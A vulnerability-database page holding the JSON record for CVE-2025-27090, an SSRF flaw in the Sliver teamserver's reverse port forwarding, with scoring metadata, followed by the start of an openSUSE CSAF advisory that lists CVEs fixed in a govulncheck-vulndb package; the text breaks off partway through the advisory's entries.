Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-27090 (GCVE-0-2025-27090)
Vulnerability from cvelistv5 – Published: 2025-02-19 21:11 – Updated: 2025-02-19 21:37
VLAI?
EPSS
Summary
Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server's IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
Severity ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27090",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-19T21:37:18.171767Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-19T21:37:35.320Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "sliver",
"vendor": "BishopFox",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.5.26, \u003c 1.5.43"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server\u0027s IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-19T21:11:06.671Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w"
},
{
"name": "https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f"
},
{
"name": "https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1"
}
],
"source": {
"advisory": "GHSA-fh4v-v779-4g2w",
"discovery": "UNKNOWN"
},
"title": "Server-Side Request Forgery (SSRF) in sliver teamserver"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27090",
"datePublished": "2025-02-19T21:11:06.671Z",
"dateReserved": "2025-02-18T16:44:48.764Z",
"dateUpdated": "2025-02-19T21:37:35.320Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-27090\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-02-19T22:15:24.247\",\"lastModified\":\"2025-02-27T20:30:33.563\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server\u0027s IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\"},{\"lang\":\"es\",\"value\":\"Sliver es una emulaci\u00f3n adversaria cruzada de c\u00f3digo abierto/equipo rojo framework, las organizaciones de todos los tama\u00f1os pueden utilizar las pruebas de seguridad. El reenv\u00edo de puerto inverso en Sliver TeamServer permite al implante abrir un t\u00fanel inverso en el servidor de equipos de Sliver sin verificar si el operador instruy\u00f3 al implante que lo hiciera. El \u00fanico impacto que se ha demostrado es la exposici\u00f3n de la direcci\u00f3n IP del servidor a un tercero. Este problema se ha abordado en la versi\u00f3n 1.5.43 y se recomienda a todos los usuarios que actualicen. No se conocen workarounds para esta vulnerabilidad.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"LOW\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:bishopfox:sliver:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.5.26\",\"versionEndExcluding\":\"1.5.43\",\"matchCriteriaId\":\"6109E798-21E6-4BD3-A1FE-103E1F5E90AF\"}]}]}],\"references\":[{\"url\":\"https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-27090\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-19T21:37:18.171767Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-19T21:37:27.852Z\"}}], \"cna\": {\"title\": \"Server-Side Request Forgery (SSRF) in sliver teamserver\", \"source\": {\"advisory\": \"GHSA-fh4v-v779-4g2w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"BishopFox\", \"product\": \"sliver\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.5.26, \u003c 1.5.43\"}]}], \"references\": [{\"url\": \"https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w\", \"name\": \"https://github.com/BishopFox/sliver/security/advisories/GHSA-fh4v-v779-4g2w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f\", \"name\": \"https://github.com/BishopFox/sliver/commit/0f340a25cf3d496ed870dae7da39eab4427bc16f\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1\", \"name\": \"https://github.com/BishopFox/sliver/commit/10e245326070c6a5884a02e0790bb7e2baefb3a1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. The reverse port forwarding in sliver teamserver allows the implant to open a reverse tunnel on the sliver teamserver without verifying if the operator instructed the implant to do so. The only impact that has been shown is the exposure of the server\u0027s IP address to a third party. This issue has been addressed in version 1.5.43 and all users are advised to upgrade. There are no known workarounds for this vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-02-19T21:11:06.671Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-27090\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-19T21:37:35.320Z\", \"dateReserved\": \"2025-02-18T16:44:48.764Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-02-19T21:11:06.671Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
OPENSUSE-SU-2025:14889-1
Vulnerability from csaf_opensuse - Published: 2025-03-13 00:00 - Updated: 2025-03-13 00:00Summary
govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media
Notes
Title of the patch
govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media
Description of the patch
These are all security issues fixed in the govulncheck-vulndb-0.0.20250312T181707-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-14889
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20250312T181707-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-14889",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_14889-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-57603 page",
"url": "https://www.suse.com/security/cve/CVE-2024-57603/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-57604 page",
"url": "https://www.suse.com/security/cve/CVE-2024-57604/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-0426 page",
"url": "https://www.suse.com/security/cve/CVE-2025-0426/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-1243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-1243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-1293 page",
"url": "https://www.suse.com/security/cve/CVE-2025-1293/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-1412 page",
"url": "https://www.suse.com/security/cve/CVE-2025-1412/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-20051 page",
"url": "https://www.suse.com/security/cve/CVE-2025-20051/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22870 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22870/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22952 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22952/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-23387 page",
"url": "https://www.suse.com/security/cve/CVE-2025-23387/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-23388 page",
"url": "https://www.suse.com/security/cve/CVE-2025-23388/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-23389 page",
"url": "https://www.suse.com/security/cve/CVE-2025-23389/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-24016 page",
"url": "https://www.suse.com/security/cve/CVE-2025-24016/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-24526 page",
"url": "https://www.suse.com/security/cve/CVE-2025-24526/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-24806 page",
"url": "https://www.suse.com/security/cve/CVE-2025-24806/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-24976 page",
"url": "https://www.suse.com/security/cve/CVE-2025-24976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-25196 page",
"url": "https://www.suse.com/security/cve/CVE-2025-25196/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-25199 page",
"url": "https://www.suse.com/security/cve/CVE-2025-25199/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-25204 page",
"url": "https://www.suse.com/security/cve/CVE-2025-25204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-25279 page",
"url": "https://www.suse.com/security/cve/CVE-2025-25279/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-25294 page",
"url": "https://www.suse.com/security/cve/CVE-2025-25294/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27090 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27090/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27144 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27144/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27155 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27155/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27414 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27414/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27421 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27421/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27507 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27507/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-27509 page",
"url": "https://www.suse.com/security/cve/CVE-2025-27509/"
}
],
"title": "govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media",
"tracking": {
"current_release_date": "2025-03-13T00:00:00Z",
"generator": {
"date": "2025-03-13T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:14889-1",
"initial_release_date": "2025-03-13T00:00:00Z",
"revision_history": [
{
"date": "2025-03-13T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20250312T181707-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-57603",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-57603"
}
],
"notes": [
{
"category": "general",
"text": "An issue in MaysWind ezBookkeeping 0.7.0 allows a remote attacker to escalate privileges via the lack of rate limiting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-57603",
"url": "https://www.suse.com/security/cve/CVE-2024-57603"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-57603"
},
{
"cve": "CVE-2024-57604",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-57604"
}
],
"notes": [
{
"category": "general",
"text": "An issue in MaysWind ezBookkeeping 0.7.0 allows a remote attacker to escalate privileges via the token component.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-57604",
"url": "https://www.suse.com/security/cve/CVE-2024-57604"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2024-57604"
},
{
"cve": "CVE-2025-0426",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-0426"
}
],
"notes": [
{
"category": "general",
"text": "A security issue was discovered in Kubernetes where a large number of container checkpoint requests made to the unauthenticated kubelet read-only HTTP endpoint may cause a Node Denial of Service by filling the Node\u0027s disk.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-0426",
"url": "https://www.suse.com/security/cve/CVE-2025-0426"
},
{
"category": "external",
"summary": "SUSE Bug 1237189 for CVE-2025-0426",
"url": "https://bugzilla.suse.com/1237189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-03-13T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-0426"
},
{
"cve": "CVE-2025-1243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-1243"
}
],
"notes": [
{
"category": "general",
"text": "The Temporal api-go library prior to version 1.44.1 did not send `update response` information to Data Converter when the proxy package within the api-go module was used in a gRPC proxy prior to transmission. This resulted in information contained within the `update response` field not having Data Converter transformations (e.g. encryption) applied. This is an issue only when using the UpdateWorkflowExecution APIs (released on 13th January 2025) with a proxy leveraging the api-go library before version 1.44.1.\n\nOther data fields were correctly sent to Data Converter. This issue does not impact the Data Converter server. Data was encrypted in transit. Temporal Cloud services are not impacted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-1243",
"url": "https://www.suse.com/security/cve/CVE-2025-1243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20250312T181707-1.1.ppc64le",
